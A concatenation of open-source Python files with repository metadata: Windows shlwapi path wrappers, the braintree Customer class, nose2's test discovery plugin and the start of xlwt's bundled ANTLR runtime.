_PathFileExistsW = windll.shlwapi.PathFileExistsW
_PathFileExistsW.argtypes = [LPWSTR]
_PathFileExistsW.restype = bool
return _PathFileExistsW(pszPath)
PathFileExists = GuessStringType(PathFileExistsA, PathFileExistsW)
# LPTSTR PathFindExtension(
# LPCTSTR pszPath
# );
def PathFindExtensionA(pszPath):
_PathFindExtensionA = windll.shlwapi.PathFindExtensionA
_PathFindExtensionA.argtypes = [LPSTR]
_PathFindExtensionA.restype = LPSTR
pszPath = ctypes.create_string_buffer(pszPath)
return _PathFindExtensionA(pszPath)
def PathFindExtensionW(pszPath):
_PathFindExtensionW = windll.shlwapi.PathFindExtensionW
_PathFindExtensionW.argtypes = [LPWSTR]
_PathFindExtensionW.restype = LPWSTR
pszPath = ctypes.create_unicode_buffer(pszPath)
return _PathFindExtensionW(pszPath)
PathFindExtension = GuessStringType(PathFindExtensionA, PathFindExtensionW)
# LPTSTR PathFindFileName(
# LPCTSTR pszPath
# );
def PathFindFileNameA(pszPath):
_PathFindFileNameA = windll.shlwapi.PathFindFileNameA
_PathFindFileNameA.argtypes = [LPSTR]
_PathFindFileNameA.restype = LPSTR
pszPath = ctypes.create_string_buffer(pszPath)
return _PathFindFileNameA(pszPath)
def PathFindFileNameW(pszPath):
_PathFindFileNameW = windll.shlwapi.PathFindFileNameW
_PathFindFileNameW.argtypes = [LPWSTR]
_PathFindFileNameW.restype = LPWSTR
pszPath = ctypes.create_unicode_buffer(pszPath)
return _PathFindFileNameW(pszPath)
PathFindFileName = GuessStringType(PathFindFileNameA, PathFindFileNameW)
# LPTSTR PathFindNextComponent(
# LPCTSTR pszPath
# );
def PathFindNextComponentA(pszPath):
_PathFindNextComponentA = windll.shlwapi.PathFindNextComponentA
_PathFindNextComponentA.argtypes = [LPSTR]
_PathFindNextComponentA.restype = LPSTR
pszPath = ctypes.create_string_buffer(pszPath)
return _PathFindNextComponentA(pszPath)
def PathFindNextComponentW(pszPath):
_PathFindNextComponentW = windll.shlwapi.PathFindNextComponentW
_PathFindNextComponentW.argtypes = [LPWSTR]
_PathFindNextComponentW.restype = LPWSTR
pszPath = ctypes.create_unicode_buffer(pszPath)
return _PathFindNextComponentW(pszPath)
PathFindNextComponent = GuessStringType(PathFindNextComponentA, PathFindNextComponentW)
# BOOL PathFindOnPath(
# LPTSTR pszFile,
# LPCTSTR *ppszOtherDirs
# );
def PathFindOnPathA(pszFile, ppszOtherDirs = None):
_PathFindOnPathA = windll.shlwapi.PathFindOnPathA
_PathFindOnPathA.argtypes = [LPSTR, LPSTR]
_PathFindOnPathA.restype = bool
pszFile = ctypes.create_string_buffer(pszFile, MAX_PATH)
if not ppszOtherDirs:
ppszOtherDirs = None
else:
szArray = ""
for pszOtherDirs in ppszOtherDirs:
if pszOtherDirs:
szArray = "%s%s\0" % (szArray, pszOtherDirs)
szArray = szArray + "\0"
pszOtherDirs = ctypes.create_string_buffer(szArray)
ppszOtherDirs = ctypes.pointer(pszOtherDirs)
if _PathFindOnPathA(pszFile, ppszOtherDirs):
return pszFile.value
return None
def PathFindOnPathW(pszFile, ppszOtherDirs = None):
    _PathFindOnPathW = windll.shlwapi.PathFindOnPathW
_PathFindOnPathW.argtypes = [LPWSTR, LPWSTR]
_PathFindOnPathW.restype = bool
pszFile = ctypes.create_unicode_buffer(pszFile, MAX_PATH)
if not ppszOtherDirs:
ppszOtherDirs = None
else:
szArray = u""
for pszOtherDirs in ppszOtherDirs:
if pszOtherDirs:
szArray = u"%s%s\0" % (szArray, pszOtherDirs)
szArray = szArray + u"\0"
pszOtherDirs = ctypes.create_unicode_buffer(szArray)
ppszOtherDirs = ctypes.pointer(pszOtherDirs)
if _PathFindOnPathW(pszFile, ppszOtherDirs):
return pszFile.value
return None
PathFindOnPath = GuessStringType(PathFindOnPathA, PathFindOnPathW)
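# Illustrative usage: PathFindOnPath("notepad.exe") searches the default
# directories (including %PATH%) and returns the full path on success,
# or None when the file is not found.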
# LPTSTR PathGetArgs(
# LPCTSTR pszPath
# );
def PathGetArgsA(pszPath):
_PathGetArgsA = windll.shlwapi.PathGetArgsA
_PathGetArgsA.argtypes = [LPSTR]
_PathGetArgsA.restype = LPSTR
pszPath = ctypes.create_string_buffer(pszPath)
return _PathGetArgsA(pszPath)
def PathGetArgsW(pszPath):
_PathGetArgsW = windll.shlwapi.PathGetArgsW
_PathGetArgsW.argtypes = [LPWSTR]
_PathGetArgsW.restype = LPWSTR
pszPath = ctypes.create_unicode_buffer(pszPath)
return _PathGetArgsW(pszPath)
PathGetArgs = GuessStringType(PathGetArgsA, PathGetArgsW)
# BOOL PathIsContentType(
# LPCTSTR pszPath,
# LPCTSTR pszContentType
# );
def PathIsContentTypeA(pszPath, pszContentType):
_PathIsContentTypeA = windll.shlwapi.PathIsContentTypeA
_PathIsContentTypeA.argtypes = [LPSTR, LPSTR]
_PathIsContentTypeA.restype = bool
return _PathIsContentTypeA(pszPath, pszContentType)
def PathIsContentTypeW(pszPath, pszContentType):
_PathIsContentTypeW = windll.shlwapi.PathIsContentTypeW
_PathIsContentTypeW.argtypes = [LPWSTR, LPWSTR]
_PathIsContentTypeW.restype = bool
return _PathIsContentTypeW(pszPath, pszContentType)
PathIsContentType = GuessStringType(PathIsContentTypeA, PathIsContentTypeW)
# BOOL PathIsDirectory(
# LPCTSTR pszPath
# );
def PathIsDirectoryA(pszPath):
_PathIsDirectoryA = windll.shlwapi.PathIsDirectoryA
_PathIsDirectoryA.argtypes = [LPSTR]
_PathIsDirectoryA.restype = bool
return _PathIsDirectoryA(pszPath)
def PathIsDirectoryW(pszPath):
_PathIsDirectoryW = windll.shlwapi.PathIsDirectoryW
_PathIsDirectoryW.argtypes = [LPWSTR]
_PathIsDirectoryW.restype = bool
return _PathIsDirectoryW(pszPath)
PathIsDirectory = GuessStringType(PathIsDirectoryA, PathIsDirectoryW)
# BOOL PathIsDirectoryEmpty(
# LPCTSTR pszPath
# );
def PathIsDirectoryEmptyA(pszPath):
_PathIsDirectoryEmptyA = windll.shlwapi.PathIsDirectoryEmptyA
_PathIsDirectoryEmptyA.argtypes = [LPSTR]
_PathIsDirectoryEmptyA.restype = bool
return _PathIsDirectoryEmptyA(pszPath)
def PathIsDirectoryEmptyW(pszPath):
_PathIsDirectoryEmptyW = windll.shlwapi.PathIsDirectoryEmptyW
_PathIsDirectoryEmptyW.argtypes = [LPWSTR]
_PathIsDirectoryEmptyW.restype = bool
return _PathIsDirectoryEmptyW(pszPath)
PathIsDirectoryEmpty = GuessStringType(PathIsDirectoryEmptyA, PathIsDirectoryEmptyW)
# BOOL PathIsNetworkPath(
# LPCTSTR pszPath
# );
def PathIsNetworkPathA(pszPath):
_PathIsNetworkPathA = windll.shlwapi.PathIsNetworkPathA
_PathIsNetworkPathA.argtypes = [LPSTR]
_PathIsNetworkPathA.restype = bool
return _PathIsNetworkPathA(pszPath)
def PathIsNetworkPathW(pszPath):
_PathIsNetworkPathW = windll.shlwapi.PathIsNetworkPathW
_PathIsNetworkPathW.argtypes = [LPWSTR]
_PathIsNetworkPathW.restype = bool
return _PathIsNetworkPathW(pszPath)
PathIsNetworkPath = GuessStringType(PathIsNetworkPathA, PathIsNetworkPathW)
# BOOL PathIsRelative(
# LPCTSTR lpszPath
# );
def PathIsRelativeA(pszPath):
_PathIsRelativeA = windll.shlwapi.PathIsRelativeA
_PathIsRelativeA.argtypes = [LPSTR]
_PathIsRelativeA.restype = bool
return _PathIsRelativeA(pszPath)
def PathIsRelativeW(pszPath):
_PathIsRelativeW = windll.shlwapi.PathIsRelativeW
_PathIsRelativeW.argtypes = [LPWSTR]
_PathIsRelativeW.restype = bool
return _PathIsRelativeW(pszPath)
PathIsRelative = GuessStringType(PathIsRelativeA, PathIsRelativeW)
# BOOL PathIsRoot(
# LPCTSTR pPath
# );
def PathIsRootA(pszPath):
_PathIsRootA = windll.shlwapi.PathIsRootA
_PathIsRootA.argtypes = [LPSTR]
_PathIsRootA.restype = bool
return _PathIsRootA(pszPath)
def PathIsRootW(pszPath):
_PathIsRootW = windll.shlwapi.PathIsRootW
_PathIsRootW.argtypes = [LPWSTR]
_PathIsRootW.restype = bool
return _PathIsRootW(pszPath)
PathIsRoot = GuessStringType(PathIsRootA, PathIsRootW)
# BOOL PathIsSameRoot(
# LPCTSTR pszPath1,
# LPCTSTR pszPath2
# );
def PathIsSameRootA(pszPath1, pszPath2):
_PathIsSameRootA = windll.shlwapi.PathIsSameRootA
_PathIsSameRootA.argtypes = [LPSTR, LPSTR]
_PathIsSameRootA.restype = bool
return _PathIsSameRootA(pszPath1, pszPath2)
def PathIsSameRootW(pszPath1, pszPath2):
_PathIsSameRootW = windll.shlwapi.PathIsSameRootW
_PathIsSameRootW.argtypes = [LPWSTR, LPWSTR]
_PathIsSameRootW.restype = bool
return _PathIsSameRootW(pszPath1, pszPath2)
PathIsSameRoot = GuessStringType(PathIsSameRootA, PathIsSameRootW)
# BOOL PathIsUNC(
# LPCTSTR pszPath
# );
def PathIsUNCA(pszPath):
_PathIsUNCA = windll.shlwapi.PathIsUNCA
_PathIsUNCA.argtypes = [LPSTR]
_PathIsUNCA.restype = bool
return _PathIsUNCA(pszPath)
def PathIsUNCW(pszPath):
_PathIsUNCW = windll.shlwapi.PathIsUNCW
_PathIsUNCW.argtypes = [LPWSTR]
_PathIsUNCW.restype = bool
return _PathIsUNCW(pszPath)
PathIsUNC = GuessStringType(PathIsUNCA, PathIsUNCW)
# XXX WARNING
# PathMakePretty turns filenames into all lowercase.
# I'm not sure how well that might work on Wine.
# BOOL PathMakePretty(
# LPCTSTR pszPath
# );
def PathMakePrettyA(pszPath):
_PathMakePrettyA = windll.shlwapi.PathMakePrettyA
_PathMakePrettyA.argtypes = [LPSTR]
_PathMakePrettyA.restype = bool
_PathMakePrettyA.errcheck = RaiseIfZero
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
_PathMakePrettyA(pszPath)
return pszPath.value
def PathMakePrettyW(pszPath):
_PathMakePrettyW = windll.shlwapi.PathMakePrettyW
_PathMakePrettyW.argtypes = [LPWSTR]
_PathMakePrettyW.restype = bool
_PathMakePrettyW.errcheck = RaiseIfZero
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
_PathMakePrettyW(pszPath)
return pszPath.value
PathMakePretty = GuessStringType(PathMakePrettyA, PathMakePrettyW)
# void PathRemoveArgs(
# LPTSTR pszPath
# );
def PathRemoveArgsA(pszPath):
_PathRemoveArgsA = windll.shlwapi.PathRemoveArgsA
_PathRemoveArgsA.argtypes = [LPSTR]
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
_PathRemoveArgsA(pszPath)
return pszPath.value
def PathRemoveArgsW(pszPath):
_PathRemoveArgsW = windll.shlwapi.PathRemoveArgsW
_PathRemoveArgsW.argtypes = [LPWSTR]
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
_PathRemoveArgsW(pszPath)
return pszPath.value
PathRemoveArgs = GuessStringType(PathRemoveArgsA, PathRemoveArgsW)
# void PathRemoveBackslash(
# LPTSTR pszPath
# );
def PathRemoveBackslashA(pszPath):
_PathRemoveBackslashA = windll.shlwapi.PathRemoveBackslashA
_PathRemoveBackslashA.argtypes = [LPSTR]
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
_PathRemoveBackslashA(pszPath)
return pszPath.value
def PathRemoveBackslashW(pszPath):
_PathRemoveBackslashW = windll.shlwapi.PathRemoveBackslashW
_PathRemoveBackslashW.argtypes = [LPWSTR]
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
_PathRemoveBackslashW(pszPath)
return pszPath.value
PathRemoveBackslash = GuessStringType(PathRemoveBackslashA, PathRemoveBackslashW)
# void PathRemoveExtension(
# LPTSTR pszPath
# );
def PathRemoveExtensionA(pszPath):
_PathRemoveExtensionA = windll.shlwapi.PathRemoveExtensionA
_PathRemoveExtensionA.argtypes = [LPSTR]
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
_PathRemoveExtensionA(pszPath)
return pszPath.value
def PathRemoveExtensionW(pszPath):
_PathRemoveExtensionW = windll.shlwapi.PathRemoveExtensionW
_PathRemoveExtensionW.argtypes = [LPWSTR]
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
_PathRemoveExtensionW(pszPath)
return pszPath.value
PathRemoveExtension = GuessStringType(PathRemoveExtensionA, PathRemoveExtensionW)
# void PathRemoveFileSpec(
# LPTSTR pszPath
# );
def PathRemoveFileSpecA(pszPath):
_PathRemoveFileSpecA = windll.shlwapi.PathRemoveFileSpecA
_PathRemoveFileSpecA.argtypes = [LPSTR]
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
_PathRemoveFileSpecA(pszPath)
return pszPath.value
def PathRemoveFileSpecW(pszPath):
_PathRemoveFileSpecW = windll.shlwapi.PathRemoveFileSpecW
_PathRemoveFileSpecW.argtypes = [LPWSTR]
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
_PathRemoveFileSpecW(pszPath)
return pszPath.value
PathRemoveFileSpec = GuessStringType(PathRemoveFileSpecA, PathRemoveFileSpecW)
# BOOL PathRenameExtension(
# LPTSTR pszPath,
# LPCTSTR pszExt
# );
def PathRenameExtensionA(pszPath, pszExt):
_PathRenameExtensionA = windll.shlwapi.PathRenameExtensionA
_PathRenameExtensionA.argtypes = [LPSTR, LPSTR]
_PathRenameExtensionA.restype = bool
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
if _PathRenameExtensionA(pszPath, pszExt):
return pszPath.value
return None
def PathRenameExtensionW(pszPath, pszExt):
_PathRenameExtensionW = windll.shlwapi.PathRenameExtensionW
_PathRenameExtensionW.argtypes = [LPWSTR, LPWSTR]
_PathRenameExtensionW.restype = bool
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
if _PathRenameExtensionW(pszPath, pszExt):
return pszPath.value
return None
PathRenameExtension = GuessStringType(PathRenameExtensionA, PathRenameExtensionW)
# BOOL PathUnExpandEnvStrings(
# LPCTSTR pszPath,
# LPTSTR pszBuf,
# UINT cchBuf
# );
def PathUnExpandEnvStringsA(pszPath):
_PathUnExpandEnvStringsA = windll.shlwapi.PathUnExpandEnvStringsA
    _PathUnExpandEnvStringsA.argtypes = [LPSTR, LPSTR, UINT]
_PathUnExpandEnvStringsA.restype = bool
_PathUnExpandEnvStringsA.errcheck = RaiseIfZero
cchBuf = MAX_PATH
pszBuf = ctypes.create_string_buffer("", cchBuf)
_PathUnExpandEnvStringsA(pszPath, pszBuf, cchBuf)
return pszBuf.value
def PathUnExpandEnvStringsW(pszPath):
_PathUnExpandEnvStringsW = windll.shlwapi.PathUnExpandEnvStringsW
    _PathUnExpandEnvStringsW.argtypes = [LPWSTR, LPWSTR, UINT]
_PathUnExpandEnvStringsW.restype = bool
_PathUnExpandEnvStringsW.errcheck = RaiseIfZero
cchBuf = MAX_PATH
pszBuf = ctypes.create_unicode_buffer(u"", cchBuf)
_PathUnExpandEnvStringsW(pszPath, pszBuf, cchBuf)
return pszBuf.value
PathUnExpandEnvStrings = GuessStringType(PathUnExpandEnvStringsA, PathUnExpandEnvStringsW)
#==============================================================================
# This calculates the list of exported symbols.
_all = set(vars().keys()).difference(_all)
__all__ = [_x for _x in _all if not _x.startswith('_')]
__all__.sort()
#==============================================================================
| apache-2.0 |
DiptoDas8/Biponi | lib/python2.7/site-packages/braintree/customer.py | 4 | 8252 | import warnings
from braintree.util.http import Http
from braintree.successful_result import SuccessfulResult
from braintree.error_result import ErrorResult
from braintree.resource import Resource
from braintree.apple_pay_card import ApplePayCard
from braintree.android_pay_card import AndroidPayCard
from braintree.credit_card import CreditCard
from braintree.paypal_account import PayPalAccount
from braintree.europe_bank_account import EuropeBankAccount
from braintree.coinbase_account import CoinbaseAccount
from braintree.address import Address
from braintree.configuration import Configuration
from braintree.ids_search import IdsSearch
from braintree.exceptions.not_found_error import NotFoundError
from braintree.resource_collection import ResourceCollection
from braintree.transparent_redirect import TransparentRedirect
class Customer(Resource):
"""
A class representing a customer.
    An example of creating a customer with all available fields::
result = braintree.Customer.create({
"id": "my_customer_id",
"company": "Some company",
"email": "john.doe@example.com",
"fax": "123-555-1212",
"first_name": "John",
"last_name": "Doe",
"phone": "123-555-1221",
"website": "http://www.example.com",
"credit_card": {
"cardholder_name": "John Doe",
"cvv": "123",
"expiration_date": "12/2012",
"number": "4111111111111111",
"token": "my_token",
"billing_address": {
"first_name": "John",
"last_name": "Doe",
"company": "Braintree",
"street_address": "111 First Street",
"extended_address": "Unit 1",
"locality": "Chicago",
"postal_code": "60606",
"region": "IL",
"country_name": "United States of America"
},
"options": {
"verify_card": True
}
},
"custom_fields": {
"my_key": "some value"
}
})
print(result.customer.id)
print(result.customer.first_name)
For more information on Customers, see https://developers.braintreepayments.com/ios+python/reference/request/customer/create
"""
def __repr__(self):
detail_list = ["first_name", "last_name", "id"]
return super(Customer, self).__repr__(detail_list)
@staticmethod
def all():
""" Return a collection of all customers. """
return Configuration.gateway().customer.all()
@staticmethod
def confirm_transparent_redirect(query_string):
"""
Confirms a transparent redirect request. It expects the query string from the
redirect request. The query string should _not_ include the leading "?" character. ::
            result = braintree.Customer.confirm_transparent_redirect("foo=bar&id=12345")
"""
warnings.warn("Please use TransparentRedirect.confirm instead", DeprecationWarning)
return Configuration.gateway().customer.confirm_transparent_redirect(query_string)
@staticmethod
def create(params={}):
"""
Create a Customer
No field is required::
result = braintree.Customer.create({
"company": "Some company",
"first_name": "John"
})
"""
return Configuration.gateway().customer.create(params)
@staticmethod
def delete(customer_id):
"""
Delete a customer
Given a customer_id::
result = braintree.Customer.delete("my_customer_id")
"""
return Configuration.gateway().customer.delete(customer_id)
@staticmethod
def find(customer_id):
"""
        Find a customer, given a customer_id. This does not return a result
object. This will raise a :class:`NotFoundError <braintree.exceptions.not_found_error.NotFoundError>` if the provided customer_id
is not found. ::
customer = braintree.Customer.find("my_customer_id")
"""
return Configuration.gateway().customer.find(customer_id)
@staticmethod
def search(*query):
return Configuration.gateway().customer.search(*query)
@staticmethod
def tr_data_for_create(tr_data, redirect_url):
""" Builds tr_data for creating a Customer. """
return Configuration.gateway().customer.tr_data_for_create(tr_data, redirect_url)
@staticmethod
def tr_data_for_update(tr_data, redirect_url):
""" Builds tr_data for updating a Customer. """
return Configuration.gateway().customer.tr_data_for_update(tr_data, redirect_url)
@staticmethod
def transparent_redirect_create_url():
""" Returns the url to use for creating Customers through transparent redirect. """
warnings.warn("Please use TransparentRedirect.url instead", DeprecationWarning)
return Configuration.gateway().customer.transparent_redirect_create_url()
@staticmethod
def transparent_redirect_update_url():
""" Returns the url to use for updating Customers through transparent redirect. """
warnings.warn("Please use TransparentRedirect.url instead", DeprecationWarning)
return Configuration.gateway().customer.transparent_redirect_update_url()
@staticmethod
def update(customer_id, params={}):
"""
Update an existing Customer
By customer_id. The params are similar to create::
result = braintree.Customer.update("my_customer_id", {
"last_name": "Smith"
})
"""
return Configuration.gateway().customer.update(customer_id, params)
@staticmethod
def create_signature():
return [
"company", "email", "fax", "first_name", "id", "last_name", "phone", "website", "device_data", "device_session_id", "fraud_merchant_id", "payment_method_nonce",
{"credit_card": CreditCard.create_signature()},
{"custom_fields": ["__any_key__"]}
]
@staticmethod
def update_signature():
return [
"company", "email", "fax", "first_name", "id", "last_name", "phone", "website", "device_data", "device_session_id", "fraud_merchant_id", "payment_method_nonce",
{"credit_card": CreditCard.signature("update_via_customer")},
{"custom_fields": ["__any_key__"]}
]
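    # Illustrative note: update_signature() permits nested credit_card
    # fields, so a params dict such as the following (values assumed)
    # passes validation:
    #   {"first_name": "Jane",
    #    "credit_card": {"expiration_date": "12/2020"}}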
def __init__(self, gateway, attributes):
Resource.__init__(self, gateway, attributes)
self.payment_methods = []
if "credit_cards" in attributes:
self.credit_cards = [CreditCard(gateway, credit_card) for credit_card in self.credit_cards]
self.payment_methods += self.credit_cards
if "addresses" in attributes:
self.addresses = [Address(gateway, address) for address in self.addresses]
if "paypal_accounts" in attributes:
self.paypal_accounts = [PayPalAccount(gateway, paypal_account) for paypal_account in self.paypal_accounts]
self.payment_methods += self.paypal_accounts
if "apple_pay_cards" in attributes:
self.apple_pay_cards = [ApplePayCard(gateway, apple_pay_card) for apple_pay_card in self.apple_pay_cards]
self.payment_methods += self.apple_pay_cards
if "android_pay_cards" in attributes:
self.android_pay_cards = [AndroidPayCard(gateway, android_pay_card) for android_pay_card in self.android_pay_cards]
self.payment_methods += self.android_pay_cards
if "europe_bank_accounts" in attributes:
self.europe_bank_accounts = [EuropeBankAccount(gateway, europe_bank_account) for europe_bank_account in self.europe_bank_accounts]
self.payment_methods += self.europe_bank_accounts
if "coinbase_accounts" in attributes:
self.coinbase_accounts = [CoinbaseAccount(gateway, coinbase_account) for coinbase_account in self.coinbase_accounts]
self.payment_methods += self.coinbase_accounts
| mit |
ptthiem/nose2 | nose2/plugins/loader/discovery.py | 2 | 9459 | """
Discovery-based test loader.
This plugin implements nose2's automatic test module discovery. It
looks for test modules in packages and directories whose names start
with ``test``, then fires the :func:`loadTestsFromModule` hook for each
one to allow other plugins to load the actual tests.
It also fires :func:`handleFile` for every file that it sees, and
:func:`matchPath` for every Python module, to allow other plugins to
load tests from other kinds of files and to influence which modules
are examined for tests.
"""
# Adapted from unittest2/loader.py from the unittest2 plugins branch.
# This module contains some code copied from unittest2/loader.py and other
# code developed in reference to that module and others within unittest2.
# unittest2 is Copyright (c) 2001-2010 Python Software Foundation; All
# Rights Reserved. See: http://docs.python.org/license.html
from fnmatch import fnmatch
import logging
import os
import sys
from nose2 import events, util
__unittest = True
log = logging.getLogger(__name__)
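# Illustrative sketch (not part of the original module): a plugin hooking
# handleFile as described in the module docstring. The event attributes
# follow events.HandleFileEvent as constructed below; treating *.txt files
# as tests is an assumption made for the example.
class ExampleTxtHandler(events.Plugin):
    """Claim *.txt files so that no other plugin tries to load them."""
    configSection = 'example-txt'
    def handleFile(self, event):
        if event.path.endswith('.txt'):
            # A real plugin would append suites to event.extraTests here.
            event.handled = True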
class DirectoryHandler(object):
def __init__(self, session):
self.session = session
self.event_handled = False
def handle_dir(self, event, full_path, top_level):
dirname = os.path.basename(full_path)
pattern = self.session.testFilePattern
evt = events.HandleFileEvent(
event.loader, dirname, full_path, pattern, top_level)
result = self.session.hooks.handleDir(evt)
if evt.extraTests:
for test in evt.extraTests:
yield test
if evt.handled:
if result:
yield result
self.event_handled = True
return
evt = events.MatchPathEvent(dirname, full_path, pattern)
result = self.session.hooks.matchDirPath(evt)
if evt.handled and not result:
self.event_handled = True
class Discoverer(object):
def loadTestsFromName(self, event):
"""Load tests from module named by event.name"""
# turn name into path or module name
# fire appropriate hooks (handle file or load from module)
if event.module:
return
name = event.name
module = None
_, top_level_dir = self._getStartDirs()
try:
# try name as a dotted module name first
__import__(name)
module = sys.modules[name]
except (KeyboardInterrupt, SystemExit):
raise
except:
# if that fails, try it as a file or directory
event.extraTests.extend(
self._find_tests(event, name, top_level_dir))
else:
event.extraTests.extend(
self._find_tests_in_module(event, module, top_level_dir))
def loadTestsFromNames(self, event):
"""Discover tests if no test names specified"""
log.debug("Received event %s", event)
if event.names or event.module:
return
event.handled = True # I will handle discovery
return self._discover(event)
def _checkIfPathIsOK(self, start_dir):
if not os.path.isdir(os.path.abspath(start_dir)):
raise OSError("%s is not a directory" % os.path.abspath(start_dir))
def _getStartDirs(self):
start_dir = self.session.startDir
top_level_dir = self.session.topLevelDir
if start_dir is None:
start_dir = '.'
if top_level_dir is None:
top_level_dir = start_dir
self._checkIfPathIsOK(start_dir)
is_not_importable = False
start_dir = os.path.abspath(start_dir)
top_level_dir = os.path.abspath(top_level_dir)
if start_dir != top_level_dir:
is_not_importable = not os.path.isfile(
os.path.join(start_dir, '__init__.py'))
if is_not_importable:
raise ImportError(
'Start directory is not importable: %r' % start_dir)
# this is redundant in some cases, but that's ok
self.session.prepareSysPath()
return start_dir, top_level_dir
def _discover(self, event):
loader = event.loader
try:
start_dir, top_level_dir = self._getStartDirs()
except (OSError, ImportError):
return loader.suiteClass(
loader.failedLoadTests(self.session.startDir, sys.exc_info()))
log.debug("_discover in %s (%s)", start_dir, top_level_dir)
tests = list(self._find_tests(event, start_dir, top_level_dir))
return loader.suiteClass(tests)
def _find_tests(self, event, start, top_level):
"""Used by discovery. Yields test suites it loads."""
log.debug('_find_tests(%r, %r)', start, top_level)
if start == top_level:
full_path = start
else:
full_path = os.path.join(top_level, start)
if os.path.isdir(start):
for test in self._find_tests_in_dir(
event, full_path, top_level):
yield test
elif os.path.isfile(start):
for test in self._find_tests_in_file(
event, start, full_path, top_level):
yield test
def _find_tests_in_dir(self, event, full_path, top_level):
if not os.path.isdir(full_path):
return
log.debug("find in dir %s (%s)", full_path, top_level)
dir_handler = DirectoryHandler(self.session)
for test in dir_handler.handle_dir(event, full_path, top_level):
yield test
if dir_handler.event_handled:
return
for path in os.listdir(full_path):
entry_path = os.path.join(full_path, path)
if os.path.isfile(entry_path):
for test in self._find_tests_in_file(
event, path, entry_path, top_level):
yield test
elif os.path.isdir(entry_path):
if ('test' in path.lower()
or util.ispackage(entry_path)
or path in self.session.libDirs):
for test in self._find_tests(event, entry_path, top_level):
yield test
def _find_tests_in_file(self, event, filename, full_path, top_level, module_name=None):
log.debug("find in file %s (%s)", full_path, top_level)
pattern = self.session.testFilePattern
loader = event.loader
evt = events.HandleFileEvent(
loader, filename, full_path, pattern, top_level)
result = self.session.hooks.handleFile(evt)
if evt.extraTests:
yield loader.suiteClass(evt.extraTests)
if evt.handled:
if result:
yield result
return
if not util.valid_module_name(filename):
# valid Python identifiers only
return
evt = events.MatchPathEvent(filename, full_path, pattern)
result = self.session.hooks.matchPath(evt)
if evt.handled:
if not result:
return
elif not self._match_path(filename, full_path, pattern):
return
if module_name is None:
module_name, package_path = util.name_from_path(full_path)
util.ensure_importable(package_path)
try:
module = util.module_from_name(module_name)
except:
yield loader.failedImport(module_name)
else:
mod_file = os.path.abspath(
getattr(module, '__file__', full_path))
realpath = os.path.splitext(mod_file)[0]
fullpath_noext = os.path.splitext(full_path)[0]
if realpath.lower() != fullpath_noext.lower():
module_dir = os.path.dirname(realpath)
mod_name = os.path.splitext(os.path.basename(full_path))[0]
expected_dir = os.path.dirname(full_path)
msg = ("%r module incorrectly imported from %r. "
"Expected %r. Is this module globally installed?"
)
raise ImportError(
msg % (mod_name, module_dir, expected_dir))
yield loader.loadTestsFromModule(module)
def _find_tests_in_module(self, event, module, top_level_dir):
# only called from loadTestsFromName
yield event.loader.loadTestsFromModule(module)
# may be a package; recurse into __path__ if so
pkgpath = getattr(module, '__path__', None)
if pkgpath:
for entry in pkgpath:
full_path = os.path.abspath(os.path.join(top_level_dir, entry))
for test in self._find_tests_in_dir(
event, full_path, top_level_dir):
yield test
def _match_path(self, path, full_path, pattern):
# override this method to use alternative matching strategy
return fnmatch(path, pattern)
class DiscoveryLoader(events.Plugin, Discoverer):
"""Loader plugin that can discover tests"""
alwaysOn = True
configSection = 'discovery'
def registerInSubprocess(self, event):
event.pluginClasses.append(self.__class__)
def loadTestsFromName(self, event):
"""Load tests from module named by event.name"""
return Discoverer.loadTestsFromName(self, event)
def loadTestsFromNames(self, event):
"""Discover tests if no test names specified"""
return Discoverer.loadTestsFromNames(self, event)
| bsd-2-clause |
x303597316/hue | desktop/core/ext-py/tablib-0.10.0/tablib/packages/xlwt/antlr.py | 57 | 84201 | ## This file is part of PyANTLR. See LICENSE.txt for license
## details..........Copyright (C) Wolfgang Haefelinger, 2004.
## This file was copied for use with xlwt from the 2.7.7 ANTLR distribution. Yes, it
## says 2.7.5 below. The 2.7.5 distribution version didn't have a
## version in it.
## Here is the contents of the ANTLR 2.7.7 LICENSE.txt referred to above.
# SOFTWARE RIGHTS
#
# ANTLR 1989-2006 Developed by Terence Parr
# Partially supported by University of San Francisco & jGuru.com
#
# We reserve no legal rights to the ANTLR--it is fully in the
# public domain. An individual or company may do whatever
# they wish with source code distributed with ANTLR or the
# code generated by ANTLR, including the incorporation of
# ANTLR, or its output, into commercial software.
#
# We encourage users to develop software with ANTLR. However,
# we do ask that credit is given to us for developing
# ANTLR. By "credit", we mean that if you use ANTLR or
# incorporate any source code into one of your programs
# (commercial product, research project, or otherwise) that
# you acknowledge this fact somewhere in the documentation,
# research report, etc... If you like ANTLR and have
# developed a nice tool with the output, please mention that
# you developed it using ANTLR. In addition, we ask that the
# headers remain intact in our source code. As long as these
# guidelines are kept, we expect to continue enhancing this
# system and expect to make other tools available as they are
# completed.
#
# The primary ANTLR guy:
#
# Terence Parr
# parrt@cs.usfca.edu
# parrt@antlr.org
## End of contents of the ANTLR 2.7.7 LICENSE.txt ########################
## get sys module
import sys
version = sys.version.split()[0]
if version < '2.2.1':
False = 0
if version < '2.3':
True = not False
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### global symbols ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ANTLR Standard Tokens
SKIP = -1
INVALID_TYPE = 0
EOF_TYPE = 1
EOF = 1
NULL_TREE_LOOKAHEAD = 3
MIN_USER_TYPE = 4
### ANTLR's EOF Symbol
EOF_CHAR = ''
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### general functions ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
## Version should be automatically derived from configure.in. For now,
## we need to bump it ourselves. Don't remove the <version> tags.
## <version>
def version():
r = {
'major' : '2',
